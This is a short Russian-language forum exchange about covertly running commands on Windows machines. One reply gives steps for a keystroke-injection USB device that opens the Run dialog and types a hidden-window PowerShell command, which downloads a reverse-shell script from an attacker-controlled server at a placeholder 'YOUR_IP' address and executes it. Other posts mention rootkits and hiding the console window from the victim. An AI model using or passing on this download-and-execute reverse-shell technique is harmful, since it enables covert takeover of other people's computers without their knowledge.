Может быть с помощью rootkit?

А есть ли способ напрямую без создания bat файла?

а в чем проблема использовать powershell?

Посмотри Вот эти варианты

Можно без создания скрипта, а сразу сделать выполнение скрипта powershell.
Заливаешь скрипт Invoke-PowerShellTcpOneLine себе на веб сервер, в нём настраиваешь данные (твой Ip и port).
Включаешь у себя слушателя на указанный ранее порт
Далее в уточку грузи код, который нажмет следующую комбинацию кнопок и введёт команду выполнения скрипта powershell
1. WIN+R
2. powershell -windowstyle hidden IEX (New-Object Net.WebClient).DownloadString('http://YOUR_IP/Invoke-PowerShellTcpOneLine.ps1')
3. ....
4. Reverse shell у тебя в кармане

Просто так CMD не спрячешь, для взаимодействия с ним нужно, чтобы консоль была открыта. Раньше я баловался с переворачиванием экрана, в промежутках между вводом команд в консоли, но в новых версиях 10 винды хоткеи переворота экрана выключили.